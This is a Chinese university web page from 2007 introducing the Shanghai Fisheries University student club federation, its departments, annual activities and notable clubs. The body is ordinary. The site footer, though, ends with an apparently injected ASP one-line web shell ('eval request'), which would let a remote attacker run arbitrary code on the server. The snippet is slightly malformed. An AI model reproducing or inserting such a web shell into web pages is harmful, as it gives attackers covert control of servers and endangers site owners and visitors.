当前位置:共青团上海海洋大学委员会 >> 学生组织 >> 校社团联 >> 社联简介 >> 正文  
站内信息搜索:
上海水产大学社团联合会简介
[2007年09月18日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

上海水产大学社团联合会成立于2002年,是在各个社团联合的基础上统筹负责校内社团活动管理、服务的学生组织。它直接接受校团委的领导,与学生会、团委各部共同构成了校级学生组织的基本构架。

作为与各个社团进行沟通联络的组织,社团联更突出其活动内容的自主性与范围的宽泛性。秉着活跃水大校园 文化,对全体学生负责的态度,社团联积极对校园社团资源进行整合、管理,使各社团在统筹的规范下有序地开展自己的活动。同时,目前社团联也在强化其服务与沟通的职能,尽可能地保障校内外社团之间、校内各社团之间,以及社团与同学之间信息渠道的通畅,为各个社团在能力所及的范围内提供资金、人力、物力等各方面的支持,协助他们开展一系列丰富多彩的活动。大家共同的目的是创造并巩固水大一个良好的校园文化氛围。

上海水产大学社团联合会是由:主席团、秘书部、社团事务部、活动调研部、信息档案部、宣传企划部、对外联络部、财务审计部共八个部门组成。大家各司其职,分工合作,社团联像一台高速运转的机器,每个部门都是机器的零件,不可或缺;社团联又像是一个大家庭,每个人都是其中的一员,亲密无间。

 

各部门介绍:

 

  秘书部:   负责处理社团联合会内部的各项事务以及社联的日常考勤。是社团联合会各部门之间的桥梁和纽带;也是监督和管理社团联内部成员的主要部门。

 社团事务部:负责各学院社团管理中心和社团之间的沟通,处理各社团的具体事务以及新社团的成立工作。此外还负责汇总各社团的活动信息,每月一次向全校师生预告。

  活动调研部:主要负责学海路小区所有社团活动的调研工作,并给予评分作为每年评选明星社团的重要依据。该部门还负责处理各社团活动开展过程中的纠纷。

  信息档案部:对全校社团以及社团联合会的档案资料进行收集、分类、归档和整理,忠实地还原社团成长的每一个脚步,此外还包括每学期对社团进行注册的相关工作。

  对外联络部:负责与其他高校的社团联合会保持长期联系交流与合作,承接我校社团联举办各项外事活动的对外沟通与协调工作,积极开拓平台供我校社团与外校社团、赞助单位的合作。

  财务审计部:负责社团联合会的日常财务工作,每个学期对全校的各个社团财务账目进行审查与监督,对社团的赞助活动进行审核与规范。

  宣传企划部:负责社团联的日常宣传(文字版、电子版)和刊物制作,协助各社团的宣传活动,借鉴外校经验提供各项活动的策划案。

 

社团联合会主办的活动:

l        负责统筹每学年第一学期的我校所有学生社团的招新工作

l        负责筹办每学年的上海水产大学社团文化节

l         负责我校明星社团评比的相关工作

l        开展我校学生社团负责人培训班

l        负责筹办我校社团发展论坛

 

我校社团简介:

   上海水产大学目前共有登记注册的学生社团90个,分为学术科技类、理论实践类、文学艺术类和体育健身类,涵盖面较广,学与热情高。社团活动的开展,有利于大学生开阔视野、增长知识、培养能力、陶冶情操。

 

我校社团风采:

       IT社团联盟,作为全国明星社团,上海市明星社团,深受广大师生的欢迎。他们开展的活动可谓丰富多彩,是我校社团队伍中的佼佼者。他们最大限度的发现人才,信任人才,鼓励人才不断奋进视为自己的唯一生命。

   观赏鱼爱好者协会,是一个具有鲜明水大特色的社团组织。协会多次开展专家讲座、社员经验交流会、社会调查、野外考察、观赏鱼认养等活动,真正将“弘扬鱼文化,传播鱼知识,丰富校园生活”运用到了实践中。

   “服务社会,奉献爱心”是我校青年志愿者服务队的宗旨。他们活跃在我校和社会的各个角落。四个长期活动:义务支教、爱心扶残、爱心敬老、LOVE TO致立。无论校内校外,同学们都能看到他们的身影,有困难请找“小红帽”已是水产大学的一大特色。曾获上海市先进集体及校“明星社团”的称号。

    天文爱好者协会成立至今已有五年,旨在弘扬科学,破除迷信,普及天文知识。他们开展了如天文知识普及、天体观测、专家讲座、参观考察以及其他形式的天文活动。已经成为上海天文会启明星联盟的重要组成部分,在多次的大众科普活动中都起着重要的作用。

   “风亦流行”街舞社是我校文艺类社团的一个佼佼者,每周将在舞蹈房教舞两次而出勤人数都达到90%以上,培养了一批又一批的舞蹈人才,除了跳舞,他们每学期还会举办街舞专场演出和其他类型的晚会,给同学带来激情和活力的街舞艺术。

这样的优秀社团还有很多很多。例如,荣膺上海市优秀社团的青春驿站心理协会,别具特色的“水域”动漫爱好者协会、韵律动感的“水YOUNG年华”健美操社等等,这些形式多样的社团活动给校园文化建设带来了生机和活力,促进了校园文化多渠道、深层次、高质量的发展。

 

 

 

关闭窗口

上一篇:没有了

下一篇:没有了
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>